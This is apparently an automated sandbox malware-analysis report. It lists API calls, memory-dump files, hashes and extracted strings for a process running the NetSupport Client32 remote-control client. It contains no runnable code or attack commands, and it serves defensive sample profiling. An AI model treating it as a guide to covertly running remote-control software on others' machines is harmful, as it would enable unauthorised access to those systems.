                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: BlockingCallCancelSleep
                                                                                          • String ID:
                                                                                          • API String ID: 3706969569-0
                                                                                          • Opcode ID: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
                                                                                          • Instruction ID: f274e3945454fef5c1105bf473dafe4b7b9938a92db539b2a6d72b189ff1db9d
                                                                                          • Opcode Fuzzy Hash: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
                                                                                          • Instruction Fuzzy Hash: 2FB092B0392350CDAF01177E4D0629A30D80FC424BF6208606A51CAD8AEF20D506A929
                                                                                          APIs
                                                                                            • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                            • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                          • GetLastError.KERNEL32(?,013FB8D8,000000FF,?), ref: 11144ED5
                                                                                          • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,013FB8D8,000000FF,?), ref: 11144EE5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                          • String ID:
                                                                                          • API String ID: 3768737497-0
                                                                                          • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                          • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                          • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                          • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LockitLockit::_std::_
                                                                                          • String ID:
                                                                                          • API String ID: 3382485803-0
                                                                                          • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                          • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                          • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                          • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                          APIs
                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75A78400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                          • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                          • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                          • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                          APIs
                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationToken
                                                                                          • String ID:
                                                                                          • API String ID: 4114910276-0
                                                                                          • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                          • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                          • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                          • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                            • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 328603210-0
                                                                                          • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                          • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                          • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                          • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,6C5F6F16,00000000,?,6C5FD40B,00000001,6C5F6F16,00000000,00000000,00000000,?,6C5F6F16,00000001,00000214), ref: 6C5FA0C5
                                                                                            • Part of subcall function 6C5F60F9: __getptd_noexit.LIBCMT ref: 6C5F60F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 328603210-0
                                                                                          • Opcode ID: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
                                                                                          • Instruction ID: 007abf6902efb8a09d600b6b51ba5231d223184a43b03df5e63c19687b988cdf
                                                                                          • Opcode Fuzzy Hash: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
                                                                                          • Instruction Fuzzy Hash: 4B01D8313062119FFB1D9E26DC54B57376CEF81369F114629E835C7990DB75D802CE52
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __waccess_s
                                                                                          • String ID:
                                                                                          • API String ID: 4272103461-0
                                                                                          • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                          • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                          • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                          • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __fsopen
                                                                                          • String ID:
                                                                                          • API String ID: 3646066109-0
                                                                                          • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                          • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                          • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                          • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                          APIs
                                                                                          • _NSMClient32@8.PCICL32(?,?,?,00A510A2,00000000), ref: 00A5100B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3898205616.0000000000A51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A50000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3898187027.0000000000A50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_a50000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Client32@8
                                                                                          • String ID:
                                                                                          • API String ID: 433899448-0
                                                                                          • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                          • Instruction ID: 6cddb63b42c8a5e213129c554caef22334a7fbd20895fb35da59db8f4c2e5512
                                                                                          • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                          • Instruction Fuzzy Hash: E6B092B211434D9B8714EE98E941D7B339CBA98600F000809BD0543282CA71FC609671
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                          • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                            • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                            • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                            • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                            • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                            • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                            • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                          • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                          • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                          • SetEvent.KERNEL32(000000F8), ref: 1102D3E7
                                                                                          • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                          • PostThreadMessageA.USER32(00001C84,00000000,00000000,00000000), ref: 1102D5BC
                                                                                          • CloseHandle.KERNEL32(00000294), ref: 1102D815
                                                                                          • _free.LIBCMT ref: 1102D825
                                                                                          • _free.LIBCMT ref: 1102D841
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                          • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                          • _memset.LIBCMT ref: 1102D983
                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                          • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                          • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                          • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                          • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                          • String ID: *.*$506407$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                          • API String ID: 2369127096-1333306918
                                                                                          • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                          • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                          • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                          • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                          APIs
                                                                                          • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                            • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                          • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                          • _sprintf.LIBCMT ref: 1103B2BB
                                                                                          • _fputs.LIBCMT ref: 1103B330
                                                                                          • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                          • _free.LIBCMT ref: 1103B336
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                            • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
